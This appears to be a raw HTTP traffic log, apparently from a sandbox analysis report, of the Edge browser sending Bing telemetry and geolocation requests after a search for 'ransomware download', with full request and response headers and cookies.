cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9C02189F4A354694B6D371B7D94CBFD2 Ref B: LTSEDGE1006 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327ce4
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22bingpages%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2212%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22bingpages%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2212%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 09B9B4D2104B4CA6A4460365F51D34EA Ref B: LTSEDGE1912 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327ce6
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialConfigDisabled%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialConfigDisabled%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 65e0a39153ff4017be348ae3540d2830
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-tI5fRvXI+1DDeOg4NHei/BLRe6xL1G2Lox6XBKxAN/k='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: EA407F2CAFB24E719AB78C8EF65E2C86 Ref B: LON04EDGE0916 Ref C: 2024-02-29T15:32:33Z
date: Thu, 29 Feb 2024 15:32:33 GMT
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:32:33 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1&BLOCK=TS=240229153233; domain=.bing.com; expires=Tue, 25-Mar-2025 15:32:33 GMT; path=/; secure; HttpOnly; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327cd7
-
GEThttps://www.bing.com/geolocation/write?isBlocked=true&sid=172BBB3C780F696B1A6EAF0879376803&clientsid=undefinedmsedge.exeRemote address:92.123.128.152:443RequestGET /geolocation/write?isBlocked=true&sid=172BBB3C780F696B1A6EAF0879376803&clientsid=undefined HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 894E51FFE9014FE185A4A912101AD722 Ref B: LON04EDGE0710 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327ce5
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E3CCD1B4237443E0B24E2B1838773A7E Ref B: LON04EDGE0916 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327dbf
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
pragma: no-cache
content-length: 235
content-type: text/html; charset=utf-8
content-encoding: br
expires: Thu, 01 Jan 1970 00:00:00 GMT
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 65e0a391881d4487af9090c5192fb912
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-kF114TxcSW6ISRqiszv+sXh3uZJKBo6Upvj/WQOya0w='; base-uri 'self';report-to csp-endpoint
